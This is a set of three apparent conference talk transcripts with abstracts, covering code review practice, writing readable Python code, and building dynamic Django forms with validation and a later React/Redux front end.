Ask about intent, to avoid misunderstandings. As a reviewer, check your own understanding before assuming a mistake, and leave comments that help rather than tear down. Usually when we review, we are very quick to point out flaws and to criticize, but a positive comment is a good way to start, even when there's nothing that needs to change. Either you noticed the good parts or you didn't. On top of that, we tend to say very little: we say nothing at all, or we just say plus one. Even for the small things, say thank you. Don't take the work for granted. I know it's a programmer's job to have their code reviewed, but you can still show appreciation. Many projects have contributing guidelines; I think you should also have review guidelines, so people know what to expect from the process. So what should go into those guidelines? Beyond describing what a good change looks like, describe how a review should be carried out and what reviewers should focus on. And you shouldn't stop at whatever your company or your organization hands you; your own team should have its own review guidelines as well. Think about what you do when there is a disagreement between the reviewer and the author; every team may handle that differently, so decide it up front as a team. You might want to agree that reviews get done within a day or two, but not longer than that. It's also a good idea to have alternate reviewers, so the same person isn't the only reviewer every time; a different reviewer can bring an extra perspective. So, now that we know more about the review process, let's get practical. This is code I actually found in our legacy codebase, and I'm paraphrasing it slightly. It's two simple lines: os.system, "rm -rf", and some file. The first thing I notice is that this isn't the newer string formatting; there's a better way to build that string, this is the old style, so I suggest changing the format. Now the file name is interpolated properly, but I still don't understand what the line does, so I ask a question: what is os.system? It's a way to run a shell command from Python. While looking that up, I also found that I should probably be using a different module for running commands; os.system isn't recommended. Great, I learned something new, so I suggest changing that too. So now we know what this does: it shells out to rm -rf and tries to delete the file, and if anything goes wrong, we never hear about it; apparently we don't care. I'm not comfortable with that. What if someone later relies on that file actually being gone? And is there a better way to remove a file from Python in the first place? You can use the os functions to remove it directly. The same goes for the other part. Why did I question a line that everyone had trusted? Because there was a problem, and I wanted to understand it; I wanted to know what the file was being used for. So this is what the code looks like now, and I'm much more comfortable with it than with the version we started with. So, let's wrap up there. Thank you. I think we have time for questions. If anyone wants to come up, I'll take questions. I have a question: do you use an automated style checker as part of your reviews, or do you rely on internal conventions? Because that's something I've been trying to figure out. Yes, it really varies. We try to follow PEP 8. I use Pylint.
I also use the checks that come built into PyCharm. But every developer has their own preferences: I have colleagues who prefer underscores and colleagues who prefer camelCase, so everyone has their own style. That's something each team has to settle for itself. Do we have another question? I'm very curious about reviews across team boundaries versus keeping them internal: do you review changes from people outside your own team, and do they review yours? I think it depends on the codebase. We mostly review within our own team. We review the code we share with a lot of care, but sometimes something slips through that nobody mentioned and nobody flagged, and we end up with people introducing their own conventions. They say, hey, we have this convention now, keep following it. I've started some conventions myself that I then had to go back and forth with other reviewers about to get changes into their code, and I've run into that a lot. I'm not sure exactly why, but my reviews didn't used to include much praise. I see a lot of, yes, approved. Sometimes a suggestion here and there. But when I felt a change was genuinely good, I'd think, that will help, and giving that appreciation has to become part of the culture, because if you only give criticism and never say the good things, you miss an opportunity. I had to change my own habits. I know at the start I would just say, okay, approved, one small comment. But once I saw how much the appreciation mattered, it became important to me. So now when I review, I comment more, I try to help more, and I know the feedback lands better; we write more messages to each other. But not every reviewer will have that habit, so it's something you have to keep working on. You also have to set aside time on the day the review comes in, because a lot of the time people just want to push ahead with their own work and don't want to stop for someone else's review. I schedule it for myself. I do reviews at the times that work best for me: in the morning, before lunch, or after lunch before I leave, just to make sure they actually get done. And remember that you need their help, and they need yours. When you set a good example, people see that this is how it's supposed to work. We have one more question. I think you had thoughts on how to scale this down to a small team; they're three developers. Yes, when you have three developers, you end up reviewing for the same people again and again, and everyone gets asked for a lot of reviews; I've been on a small team too. I try to keep the changes smaller, and if you can, mix up who reviews what within the same codebase, so the same pair isn't always reviewing each other and nobody gets overloaded. And if someone already has too much on their plate, they should be able to say, I'm sorry, I can't do a review today; maybe you want to ask someone else to do it. Thank you.
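As a rough illustration of the legacy snippet discussed in the talk (the slides are not in the transcript, so the path and the exact wording here are invented), the before-and-after of that review conversation might look something like this in Python:

    import os

    # Before: shell out and silently ignore any failure.
    # os.system("rm -rf %s" % "/tmp/report.csv")

    # After: one direction the review conversation pointed, removing the
    # file from Python itself, so a failure raises a visible exception
    # instead of being swallowed by the shell command.
    path = "/tmp/report.csv"
    if os.path.exists(path):
        os.remove(path)

The value in the sketch is the conversation itself: asking what os.system does, learning the trade-offs, and ending up with code that both the author and the reviewer understand.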
|
Code review is like a buzzword in the programming world. Developers often talk about how important it is. But what really happens during code review? What do you achieve out of it? How can we learn during code review? This talk will present ideas of what should be the goals of a code review, and how can developers learn during code review process.
|
10.5446/32713 (DOI)
|
Come on, y'all! Hey, everyone. Let's talk about readability. So before we talk about readability, let's just kind of make sure that we're all on the same page. So textbook definition, readability is really just the measure of how easily we can read our code. So I'm assuming you're all here because you care about readability, but why do we actually care about readability? What makes it actually important? So every time you fix a bug, change some functionality, or add a new feature to your code, you probably need to read some code. So you probably read code more often than you write it. Also, you do sometimes need to change code. Code doesn't always stagnate immediately after you write it. In order to change something, you need to read it. So readability is really a prerequisite for maintainability. You can't have maintainable code unless you have a readable code. Lastly, not all teams are immortal. You do sometimes need to hire developers, and those developers will need to be onboarded into your team. It's a lot easier to onboard people when they can read your code. So before we get started, let's make it clear what we're not going to talk about. We're not going to talk about how easy it is to write code. We're not going to talk about how easy it is for the computer to read your code and to run your code. We're only talking about how easy it is for humans to read your code. So we'll talk about how to structure your code, which pretty much boils down to where you put your line breaks. We'll also talk about naming unnamed things and also naming things more descriptively. And finally, we'll reconsider some of the programming idioms that we use every day. We'll be looking at a lot of small code examples. So if you can't keep up, don't worry. I'm going to tweet out the code afterwards. There's a lot going on. All right. So let's talk about the structure of our code first. In the modern age, line length is not a technical limitation anymore. Screens are really wide. Line length is not about punch cards. It's about how readable your code is. Long lines are not easy to read. Line length is a little flawed, though, because when it comes to readability, indentation isn't quite the same as code. So instead of focusing on line length, I propose that we focus on text width. This is basically line length where we ignore the indentation. Now, I don't know what a good average text width is. I prefer kind of a 60-character maximum, but really most importantly, we should focus on making our code readable when it comes to text width and not worrying about some arbitrary limit. Short lines are not our end goal. Readability is our end goal. All right. Let's talk about line breaks. So this code has a text width under 60 characters. As you read this code, you're probably trying to figure out what it does. You're not going to figure out what it does until you've figured out what the structure of this code actually is. You'll eventually notice that that first statement there has a generator expression with two loops in it, and that second statement has a generator expression with one loop and a condition in it. This code is hard to read because the line breaks were inserted completely arbitrarily. The author simply wraps their lines whenever they got near some maximum text width or line length. The author was valuing text width or line length as the most important thing. They completely forgot about readability. Is this code more readable? 
This is the same code as before, but the line breaks have been moved around to split up the code into logical parts. So these line breaks were not inserted arbitrarily at all. These were inserted with the express goal of readability. All right. Let's take a look at another example. Let's say you're creating a Django model and one of your model fields has a whole bunch of arguments passed into it. So we're passing a lot of arguments into this foreign key field here, and it's feeling a little unwieldy. Is this a good way to wrap our code over multiple lines? What about this way? Is this better or is this worse? What about this one? How does this compare? Would anything change if we were using exclusively keyword arguments here? Would that affect our choice at all? So personally, I usually prefer that last strategy for wrapping my lines, especially with all keyword arguments. I almost always prefer that last one. The first one's a little difficult to read, and that second one can be kind of problematic when you have really long lines like we do here. All right. So let's take a look at that last strategy a little more closely. Would it be better to leave off the closing parenthesis or rather to put that closing parenthesis on its own line? Okay. Got a lot of nods here. What if we added a trailing comma? Would this be an improvement or is this worse? Better. Okay. All right. So personally, I also prefer this last one here. Now, I am certain that there are some of you in this room who are not nodding your heads who disagree with this preference of mine. That fact is okay. The fact that we disagree means that we need to document the way that we're wrapping our function calls in our style guide for every project we make. You do have a style guide for every project you make, right? Your style guide doesn't just mention PEP 8. I'm going to dramatically drink some water here as you think about this. All right. So consistency lies at the heart of readability. You need to make sure that you are defining a style guide with really explicit conventions in every single Django project that you make. Do poets use a maximum line length to wrap their lines? No. Poets break up their line breaks with purpose. In poetry, inserting a line break is an art form. In code, inserting a line break is an art form. So as programmers, we should wrap our lines with great care. And remember, all your projects should have a style guide that goes well beyond PEP 8. Your code style convention should be explicitly documented. All right. Let's talk about naming things. If a concept is important, it needs a name. Names give you something to communicate about. Unfortunately, naming things is hard. Naming a thing requires that you describe it. And describing a thing isn't always easy. Not only that, once you've described a thing, you need to shorten that description into a name. And that's not always easy either. If you can't think of a good short name, use a long and descriptive one. That's a lot better than a subpar name that's really short. You can always shorten a name tomorrow. It's hard to make a name a little bit longer. So worry about accuracy, not the length of your names. Okay. Let's take a look at some code with some poor variable names. I bet that you do not know what SC stands for in this code. Anyone want to guess? It does not stand for South Carolina. So you might know if you had more context that this stands for state capitals. Don't use two letter variable names in Python code. Use descriptive names. 
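To picture the wrapping style preferred in the model-field example a moment ago (one keyword argument per line, a trailing comma, and the closing parenthesis on its own line), a sketch might look like the following; the model and argument values are invented, since the slide code is not in the transcript:

    from django.db import models

    class Article(models.Model):
        # Each keyword argument gets its own line, ending with a
        # trailing comma, and the closing parenthesis sits alone.
        author = models.ForeignKey(
            'auth.User',
            on_delete=models.CASCADE,
            related_name='articles',
            blank=True,
            null=True,
            help_text='The user who wrote this article.',
        )

One practical benefit of the trailing comma is that adding or removing an argument later touches only a single line in the diff.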
Now, speaking of descriptive names, what does the I variable here represent? Index, okay. Is it a two-tuple? Maybe something else? Is i[0] capitals, or is it states? Or something else entirely? So when you see an index access, this should be a red flag. Index accesses can usually be replaced by variables. We can do this with tuple unpacking. So you can probably tell now that S and C mean state and capital. Or maybe you could guess that. Avoid using arbitrary indexes in your code. Whenever possible, use tuple unpacking instead. It's often a lot more explicit to have named variables than it is to have indexes in your code. Now, you probably did guess that S and C mean state and capital, or maybe you know because I told you. But there's no reason not to use real words here instead. This makes our code a lot easier to read, and it wasn't that hard to type. Name every variable with care. Optimize for maximum accuracy and optimize for maximum completeness. Make sure you're describing everything as fully as you can. Okay. Let's take a look at an example of code that could use some more variable names. This code returns a list of all anagrams of words that are in the candidates list. It's not bad code, but it's also not the most descriptive code. The if statement in particular is pretty loaded. There's a lot going on there. What if we abstracted out that logic into its own function? So with this is_anagram function here, I think it's a lot more obvious that we're checking whether two words are in fact anagrams. We've broken down the problem and described the process that we're using and left out the details. The details are inside that function. Let's take a look at that function. So this is pretty much exactly what we had inside our if statement before. It could use a little bit of work. Firstly, word1.upper and word2.upper both appear twice. We've got some code duplication there. Let's fix that. Okay. That's a lot better. I certainly find that conditional on that last line easier to read, but I think there's still more room for improvement. So one strategy that we could employ here is to read our code aloud. So I like to read my code aloud to see how descriptive it is. Here we're sorting our words, checking whether the sorted versions are equal, and then checking whether the unsorted versions are, sorry, checking whether the words are not in fact the same word. Now, that description took me a little bit to read, because it's not the easiest thing to figure out. That description isn't very helpful. It's not very much like how we'd describe this in English. If we add some comments to describe this in actual English, we can see that we're actually checking whether the words have the same letters and whether they're not the same words. Now, this code is formatted a little bit strangely, but it is more descriptive. We've added comments to describe what's actually going on. Whenever you add comments, though, that might be a hint that you actually need another variable name or a better variable name. In this case, we need some more variable names. So here we've turned those conditional statements into two new variables that describe what they actually do. have_same_letters and are_different_words describe exactly what we're doing. That last line literally says: return have_same_letters and are_different_words. We've broken down this problem to make it more clear and more readable, because we're conveying the intent of our algorithm, not just the details.
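The slide code is not included in the transcript, but based on the description, the final version of the function would look roughly like this:

    def is_anagram(word1, word2):
        """Return True if the two words are anagrams of each other."""
        word1, word2 = word1.upper(), word2.upper()
        have_same_letters = sorted(word1) == sorted(word2)
        are_different_words = word1 != word2
        return have_same_letters and are_different_words

Each intermediate variable names one of the two checks, so the return line reads almost exactly like the English description of the algorithm.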
Okay, so we ended up adding four extra lines to that code, but we broke down our process a bit in doing so. It's a little bit more understandable at first glance. You may think this example is silly. I mean, what we started with wasn't really that complex, but this process was a worthwhile mental exercise regardless, even if we're going to end up reverting this code afterwards. The exercise of refactoring your code to be more self-documenting is almost always a worthwhile endeavor. It helps you reframe the way that you actually think about your code. Okay, let's take a look at a complex Django model method. I'm going to go through this one a little bit quickly, and there's a lot of code here. I don't want you to read this code. I'd like you to unfocus your eyes and focus on just the shape of this code. There, did you do it? Okay, so the first thing you'll notice is that this code is broken up into three sections. There's three sections because there are three logical parts to this code. If we add comments to each of those sections, we can better see what's actually going on. Now, remember I said comments are maybe a step in the direction of making variables that don't exist or making variables with better names. We're missing names here. We could name these sections by making methods for them. So even when you see the code here, you're tempted to read the comment, because the comment's what's actually saying what's going on. Next step: make methods for these. If we split these out into helper functions, those names actually describe what the code is doing. I left in the docstrings because, you know, there's no reason not to leave in documentation. Documentation is not quite the same as comments. It's always good to document your things. If we call those methods in our original function, this now describes the actual process. This is almost like English here. If we wanted to see what each of these is doing, we can jump into that function. We don't have to be distracted by the fact that it's doing some really detailed stuff under the hood. Okay, so brief recap. Read your code aloud to ensure that you're describing the intent of your algorithm in detail. Remember that comments are great for describing things, but sometimes a comment is just the first step toward a better variable name or a variable name that didn't exist before. Also, make sure you're giving a name to everything. And in general, strive for descriptive and self-documenting code. Okay, so this section's a little long. I may end up skipping over one or two of these little subsections here. Basically, let's talk about the code constructs that we actually use and make sure that our code constructs are as specific as they should be. When given the opportunity, I prefer to use a more special-purpose tool rather than a more general-purpose tool if it makes sense. Specific problems call for specific solutions. So let's take a look at exception handling. Here we're opening a database connection, reading from it, and closing the connection. We need to make sure that we're closing the connection every time that we exit this code, even if an exception occurs. So we have this try-finally block here. Now, whenever you see any code that has kind of a cleanup step, think about whether or not you could use a context manager. It's not that hard to actually write your own context managers. You just need a dunder enter and a dunder exit method, that is, __enter__ and __exit__. By the way, dunder stands for double underscore, for anyone who's not familiar with that nomenclature.
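The talk's actual example is not in the transcript, but a minimal sketch of such a context manager (using sqlite3 here purely so the example is self-contained and runnable) could look like this:

    import sqlite3

    class DatabaseConnection:
        """Open a connection on entry and always close it on exit."""

        def __init__(self, path):
            self.path = path
            self.connection = None

        def __enter__(self):
            self.connection = sqlite3.connect(self.path)
            return self.connection

        def __exit__(self, exc_type, exc_value, traceback):
            # Runs even if the body of the "with" block raised an exception,
            # so the cleanup step can never be forgotten.
            self.connection.close()

The with-statement usage that the talk turns to next is where this pays off: the caller no longer has to remember the cleanup at all.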
Let's look at how this context manager is actually used. Okay, so this is a little bit more clear than what we had before, in the sense that we're not distracted by the fact that we have to close our database connection when we're done with it every time. The code does that work for us. Now, we just implemented our own context manager, but the standard library already had one we could have used, in contextlib, called closing. You don't always have to implement your own context managers, but you can if you want to, and it's not that hard. So whenever you have a cleanup step, think of a context manager. Okay, let's talk about for loops. This code loops over something. You can tell that even though it's blurred out. This code actually does a little bit of something more, though. Specifically, the purpose of this code is to loop over something, check a condition, and create a new list from every item that passes that condition. So we're using a list append, an if statement and a for loop to accomplish this task. There's a better way to write this code, though. Here we are accomplishing the same task, but instead of using a for loop, an if statement and an append call, we're using a list comprehension. We've removed a lot of the unnecessary information that our brains would have to process otherwise. At a glance, we can see that this code is not just looping, it's creating one list from another list. That's a better description of what our code actually does. When you have a specific problem, use a specific tool. Okay, I'm going to skip this one. You can look at the slides afterwards. Well, we'll go over it very briefly. So essentially, if you have something that has methods that look like this, contains, set, add, remove, is empty, this is very similar to what Python objects actually do under the hood. What a container does of any variety, what a list does, what a dictionary does: think about whether or not you should be making your own version of those containers. You can do that with abstract base classes in the standard library, or you can roll it yourself using dunder methods. Let's talk about functions. This code connects to an IMAP server and reads email. Notice that one of these functions returns a server object and the other three functions accept a server object. That should be a hint that something weird is going on here. If you ever find that you're passing the same data to multiple functions, think about making a class. This is exactly what classes were designed for. I know there's a big pushback against making classes, and against object-oriented programming in general, but classes bundle functionality and data together. Whenever you're doing that in your code, it's appropriate to use them. Let's do a recap. When you find yourself wrapping code in redundant try-finally or try-except blocks, and whenever you have a cleanup step in general, think about using a context manager. Also, when you're making one list from another list, there's an idiom for that. It's called a list comprehension. It might be a little bit more clear to use than a for loop. When one object looks like a container but isn't a container, it probably should be a container. You can turn it into a container by using dunder methods. Don't be afraid to use those dunder methods either, regardless of whether it's for a context manager, a container, or anything else. Dunder methods are your friend. I'm not calling them magic methods, because they are not magical. If you have a specific problem, use a specific solution.
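As a sketch of the kind of refactor being described, bundling the shared server object and the functions that need it into one class (the class and method names here are invented; the slide code is not in the transcript), it might look like:

    import imaplib

    class MailBox:
        """Bundle the IMAP connection with the operations that need it."""

        def __init__(self, host, username, password):
            self.server = imaplib.IMAP4_SSL(host)
            self.server.login(username, password)

        def message_count(self, folder='INBOX'):
            # select() reports the number of messages in the folder.
            status, data = self.server.select(folder, readonly=True)
            return int(data[0])

        def logout(self):
            self.server.logout()

Instead of passing the same server object into three separate functions, each method reaches it through self, which is the bundling of data and functionality the talk is pointing at.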
When you're writing code, stop to pause every once in a while and actively consider the readability of your code. You can use this checklist as a starting point for your own reflections on your own code's readability. As you use this checklist on your code, start to build up that code style guide that we talked about earlier, that I know you all have but want to improve. Remember that every project does need a detailed code style guide. The more decisions you can offload to the style guide, the more brain power you'll have left over to spend on more interesting and less trivial things. Finally, here's a list of videos I recommend watching when you get home, some of which contradict some of the things I said, some of which support them. Do we have time for questions? We do. We have time for two short questions. Hi, Trey. Great talk. I often forget, myself, as a Pythonista, where I can break up a list comprehension. Are there rules? Does Python care? What are the rules if I'm trying to follow your example and break up a list comprehension to replace a for-if statement? Can you create a list comprehension out of a for loop? I'm used to writing it as one big long thing. Does Python care where I split it into multiple lines? Right. So as long as you are inside parentheses, square brackets or curly braces in Python, Python allows you to break that up wherever you want. In fact, you can even indent your code in really weird ways just to make people unhappy. Don't do that. Implicit line wrapping is a really easy thing in Python. So you can break it up wherever. I would recommend breaking it up before the for clause and before the if, basically before the logical components. Cool. Thank you. Thanks, Trey. Good talk. Do you have a suggestion for a good style guide that's out there that you'd recommend looking at and then adapting to our own needs? Sorry, to look at what? Other good style guides out there that we can adopt and adjust to our own personal needs? No. This is kind of one of those do as I say, not as I do situations. None of my open source projects have a style guide. So, you're welcome. All right. Well, with that, let's get ready for the next session coming up in five minutes. Thanks, Trey. Thank you. Thanks.
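To illustrate the answer to that first question, Python's implicit line continuation inside brackets means a comprehension can be split before its logical clauses; a small sketch (with made-up data) might be:

    state_capitals = [('Pennsylvania', 'Harrisburg'), ('Ohio', 'Columbus')]

    # Break before the "for" and "if" clauses rather than at an arbitrary width.
    capitals = [
        capital.upper()
        for state, capital in state_capitals
        if state.startswith('P')
    ]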
|
Most code is read many more times than it is written. Constructing readable code is important, but that doesn't mean it's easy. If you've ever found unreadable PEP8-compliant code and wondered how to fix it, this talk is for you. Long-lived code must be maintainable and readability is a prerequisite of maintainability. It's easier to identify unreadable code than it is to create readable code. Let's talk about how to shape tricky code into something more readable and more maintainable. During this talk we'll discuss: whitespace self-documenting code modularity expectation management We'll conclude this talk with a checklist of questions you can use to make your own code more readable.
|
10.5446/32716 (DOI)
|
Come on, Noah! MUSIC Uh, so before I get started, just a show of hands: how many people have heard of or worked with Crispy Forms? Okay, so there's a lot of people. I want to see how many people are going to be upset at me if I say things about Crispy Forms before I get started. So, quickly, just to introduce myself, I'm Kurt Gittins. Like you said, I'm a software engineer at DealerTrack. And at DealerTrack, we work a lot with Django forms. We have a lot of situations where we need really complicated data entry, a lot of dynamic validations and dynamic forms — I'll get into what I mean by dynamic forms. This talk comes from a lot of what we've been building at DealerTrack and what we've learned in terms of how to use Django forms and extend their capabilities to be dynamic. But before I go into the problems that we actually solved, I want to back up and talk about what Django forms actually are. And this is kind of parallel to what's in the Django documentation. Basically, Django forms offer you abstractions over three core things. So you get an abstraction over the structuring of a form, which tells you what fields are going to be on the form. When you write your form class, you define these class-level variables that are objects, and those are your fields. So the structure of your form is basically that: what fields are going to be on the form. Then there's the rendering of a form, which is where Django takes care of actually creating the HTML elements that your users need to put data into. So Django takes care of that for you. There's a template tag; all you need to do is use the form tag, and it renders the form. So Django forms give you functionality for that. And the last part is validating and processing the data. That is where you define a set of rules for when the data that the user enters is going to be accepted. So you have the basic Django validations that you get from validators — these are things that Django adds, like when you create an integer field that captures numeric data and you set a max and min value — and then you have more complicated validations that you can write in your form clean or your individual field clean. So these are the three main things that Django gives you. And in a lot of the situations we were having at DealerTrack, we needed to make all three of these things dynamic. So, starting with structuring: what I mean by creating a dynamic form structure is that we had a situation where we needed a form where the fields on it might change depending on certain pieces of user context. And this is probably not unique to us — a lot of people might have to deal with something like this. The reason you might need to do something like this is, say you have a really basic form that captures some data, but then you need to introduce a piece of context that changes the form. So you can do that like this: you can add an if condition that adds a field to the form. self.fields is a dictionary; you can put a field into it dynamically when you instantiate the form, and everything works.
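A minimal sketch of that straightforward approach might look like this (the field names and the include_phone flag are invented for illustration, not DealerTrack's actual code):

from django import forms

class ContactForm(forms.Form):
    name = forms.CharField(max_length=100)

    def __init__(self, *args, include_phone=False, **kwargs):
        super().__init__(*args, **kwargs)
        # self.fields is just a dictionary, so we can add a field
        # conditionally when the form is instantiated.
        if include_phone:
            self.fields["phone"] = forms.CharField(max_length=20)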
So the problem with this is it doesn't scale when you have a lot of conditions. When you start getting really complicated layouts that have a ton of conditions and a ton of fields that need to change, this solution doesn't work too well, because you'll have a really messy form init that has a ton of if conditions and a bunch of custom business logic. And what you want to do is separate those two things: you want to separate the logic that determines what you see as part of the form structure from those rules. And so the way that we chose to solve this problem is by treating our fields as data. What that means is, the way that you define fields with Django right now is with an object, right? You set some kwargs on an object when you instantiate it, and that determines what Django renders and how Django validates it. But all that information you could basically represent as a dictionary instead of an object. And working with it as a dictionary makes it a lot easier to move the layouts around — your data becomes a lot more malleable. So we start off with a solution that looks something like this: your fields now become entries in an ordered dictionary, and your field structure is no longer directly tied to the form. Instead of having a class definition that says, here are the fields, here's the order, you have this, which takes in your field structure object — which is basically the same as what self.fields ultimately builds. But what you get now is a layout that's separate. So if you want to have a different layout, you define a different variable with a new ordered dictionary. And you can actually take this a step further and move the actual field objects out of it — or rather these field variables with the data — and replace them. The way this solution works is, instead of having an ordered dictionary that contains the actual fields, you create a list of strings and you grab those field definitions from some sort of module. In this example I'm using a class, but you could swap that out for anything. So you have a list now that defines your field layout, and it's completely separate from your Django form. So what you can do, and what we actually do at DealerTrack, is we have an API call that determines what fields are on the form at runtime. Our API takes care of the context and all of the specific business rules that determine what fields need to be on the form, and then it spits out just a list of strings. And the form knows what to do after it has that list of strings: it does a getattr on the class that contains the fields. So we have this class that contains all the possible fields that could be on the form — since you need to have a superset, you need those field definitions somewhere. So we grab an attribute from that class, we instantiate the actual Django field object, whether it's a character field or an integer field or something like that, and then we just stick it into self.fields, because we can add entries to that really simply. So that's all you need to do to have a dynamic field layout. But the other piece of it is actually rendering this — we need to get HTML from this dynamic field layout.
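Here is a rough sketch of the fields-as-data idea just described — one hypothetical way to store the superset of field definitions on a class and build the form from a list of strings (the names and the tuple representation are just an illustration, not the exact code from the slides):

from django import forms

class PollFields:
    # Superset of every field that could appear on the form, stored as
    # data: the field class plus the kwargs used to instantiate it.
    question = (forms.CharField, {"max_length": 200})
    age = (forms.IntegerField, {"min_value": 0})
    email = (forms.EmailField, {})

class DynamicForm(forms.Form):
    def __init__(self, field_names, *args, **kwargs):
        super().__init__(*args, **kwargs)
        for name in field_names:
            field_class, field_kwargs = getattr(PollFields, name)
            self.fields[name] = field_class(**field_kwargs)

# The layout is now just a list of strings, e.g. returned by an API call:
form = DynamicForm(["question", "email"])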
So, we know about the Django form tag, right? You just place it into your template, and it renders all the fields on your form for you. One of the problems with this, though, is that if you need any custom HTML or CSS instead of what Django generates for you, it becomes difficult, because you're not exactly sure what elements are going to be on the page. So for a while we had a solution that worked with django-crispy-forms. But I think for stuff like this, I would advise staying away from django-crispy-forms, because it forces you to tie your particular form to a particular layout. Crispy forms gives you abstractions over the actual HTML elements that you'll see on the page. But if you have a dynamic layout, you don't really want to tie it directly to your form definition — you could use that layout in multiple forms, and you don't want to be tied to one particular rendering of it. So that's how the dynamic field structure problem works. One of the other problems that we had to solve was dynamic form validation. An example of why you would want to do this — a really trivial one — is if you have an address field in your application, you might want to call out to a third-party service to validate that the address is actually correct. But the problem is that the third-party service has errors, your Django form has errors, and you want the two of those to really act as one. Because it's interesting to talk about, our actual use case at DealerTrack is that we have third-party users who write validations, in a language that we've created, that influence our Django form. Those validations they write are evaluated by a microservice that we have. That aspect of it is actually pretty complicated, but Django allows us to not worry about dealing with those errors once we actually get them back from the API. So all you really need to do to integrate external errors that you get from another service with the internal errors of your form is call add_error. Now, I wouldn't actually call an API directly in clean like this, but the approach is basically the same: you make a call out to an API, you map up the errors that you get back from the API with the fields that you have in your form, and then you just call add_error, and Django takes care of the rest. What's good about this is that if you have an existing infrastructure for displaying errors to the user — like I'm sure a lot of web applications do, since you need your user to see what's wrong on the form — this allows you to integrate those external errors as if they came from Django, and you don't have to do any extra work. You just call add_error, it takes a field and an error message, it adds it to the field in the Django form, and then however your display works, it's going to continue to work the same way.
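A rough sketch of folding external errors into a form with add_error (validate_address here is a stand-in for whatever third-party call you would make, and, as noted above, you'd probably move that call out of clean itself):

from django import forms

def validate_address(data):
    # Stand-in for a call to an external validation service; returns a
    # mapping of field name -> list of error messages.
    errors = {}
    if not data.get("zip_code", "").isdigit():
        errors["zip_code"] = ["ZIP code was not recognized."]
    return errors

class AddressForm(forms.Form):
    street = forms.CharField()
    zip_code = forms.CharField()

    def clean(self):
        cleaned_data = super().clean()
        # Map the external errors onto our own fields; after this,
        # is_valid() and error display behave as if Django produced them.
        for field, messages in validate_address(cleaned_data).items():
            for message in messages:
                self.add_error(field, message)
        return cleaned_data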
So, one last problem that we looked at at DealerTrack was having user-driven fields. Basically what I mean by this is that you give the user the ability to add a field to your Django form. To look at an example of this — okay, so this is in the middle of the animation, but basically this demonstrates: say you have a list of potential optional inputs that you want the user to be able to add; the user can select one and add it to your Django form. At first it seems like there might be a lot of problems — we think of Django forms as having a static definition — but you can actually handle this completely with our previous solution. Obviously you need a little bit of JavaScript to make sure it works the way it's supposed to, but there are basically three really simple pieces to the solution. On the UI side, actually rendering the fields is taken care of by JavaScript, which might seem a little strange, because initially you'll have a mismatch between what the user is actually seeing and entering data into, and what is actually on your Django form when you render it. But you let JavaScript implement the functionality that allows the user to add the fields to the form, and then when you save, the dynamic field structure part that we talked about before comes into play, because now you can add those additional fields that the user added to the form. The JavaScript part is not that complicated — this is a really trivial implementation of it — and basically the key part is that you need to pass data from your template context into JavaScript when you're rendering the Django template. So here I have the drop-down contents, which is a list of all the potential fields I want to allow the user to add, and then the saved drop-down fields, as a dictionary of each field the user has already saved data for and the value the user has saved for it. The reason I need both of those things is that I don't want the user to lose any data: if they saved something, then when they reload the form, JavaScript needs to create the fields that they've already saved. So all this does is loop through the drop-down contents, and if the user saved data for a field, it creates a static field that looks like everything else; if the user hasn't, it adds it to the drop-down. And then what actually drives the drop-down is just a really simple bit of JavaScript that checks for a change and adds a field in the same way. The Django form side of it is even simpler, because we have our base fields, which are what you see when you render the form, and then you have the drop-down fields, and when you're saving you can just add the drop-down fields into your field structure, because you can change it at any point. You can load with a different form than you saved with, and your validations still work, even though those fields weren't in your form when the user loaded the page. So, one last thing I want to talk about a little bit: a lot of these problems ended up leading us to the decision to move away from the architecture that we currently had, which was Django forms and regular HTML Django templates, and we moved to React.js and Redux.
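Before the React part, here is a rough sketch of the form side of those user-driven drop-down fields (OPTIONAL_FIELDS and the extra_field_names argument are invented for illustration; the JavaScript and view wiring are left out):

import copy
from django import forms

# Superset of the optional fields a user is allowed to add in the UI.
OPTIONAL_FIELDS = {
    "nickname": forms.CharField(max_length=50),
    "birthday": forms.DateField(),
}

class ProfileForm(forms.Form):
    name = forms.CharField(max_length=100)

    def __init__(self, *args, extra_field_names=(), **kwargs):
        super().__init__(*args, **kwargs)
        # Fields the user added in the browser are appended on save, so
        # their values are validated even though they weren't part of the
        # form when the page was first rendered.
        for field_name in extra_field_names:
            if field_name in OPTIONAL_FIELDS:
                self.fields[field_name] = copy.deepcopy(OPTIONAL_FIELDS[field_name])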
And the actual back end is pretty much the exact same with React.js and Redux. We still use our dynamic field structure, and that actually helps us more when we move to React.js, because what happens is we implement React components that mirror the Django fields, and then, instead of letting Django render your whole field structure, you can dump it as JSON, treat it as data once again, send it to the front end, and let React render it. React then treats your forms as pages in your single-page application — in a single-page application framework with React — and what we use Redux for is to imitate the sort of state storage and save that you would get from doing regular post requests. So Redux is just a library that you can use to store state; React just handles the actual rendering. So the Django form spits out a field structure, the same thing that we had before, React renders it, because you have the React components that mirror the Django fields, and then Redux takes care of making sure that the data the user enters is saved. Then, when the user wants to post back to the form, they can do that via Ajax. So that's really it. Any questions? I think I have some time for questions and answers, so... So, you mentioned in the last part that you started using React and Redux. How do you handle the server-side validation? You usually get messages from the back end; how do you present those in the React UI? So, the way that this actually works is — and this solution is not in the best stage it could currently be — our back end basically instantiates a Django form, because we have that field structure which represents a Django form. So the back end instantiates a Django form with the data that it gets via Ajax from React, we get form errors back, and then we just send those form errors back as JSON to React.js, and React renders them the same way that we would before. Does that answer your question? Yeah. Thanks. Do you want to go? I don't know. Thanks for the talk. That was really interesting. In fact, I work with a Django-based CMS called Wagtail that's very similar in the way that it handles its own forms in its admin. Do you have any use cases where you save the state of the form at the time that it rendered? Because if the form is just data, then you could save that JSON string of that dictionary, and then access that form in the exact state it was in at that time, and then you kind of have this sort of Django-migration-state type thing with your forms. So, with Redux, that actually kind of is what you get. Redux tracks the state of the form. As soon as you render the page, get_initial populates the field values, and that also populates Redux's state. So at that point you have a state that basically represents all of the data that you have on the page, and that state stays updated. If the user changes something on a UI element, it updates in the Redux state, and that's how we don't do anything else to capture the post data.
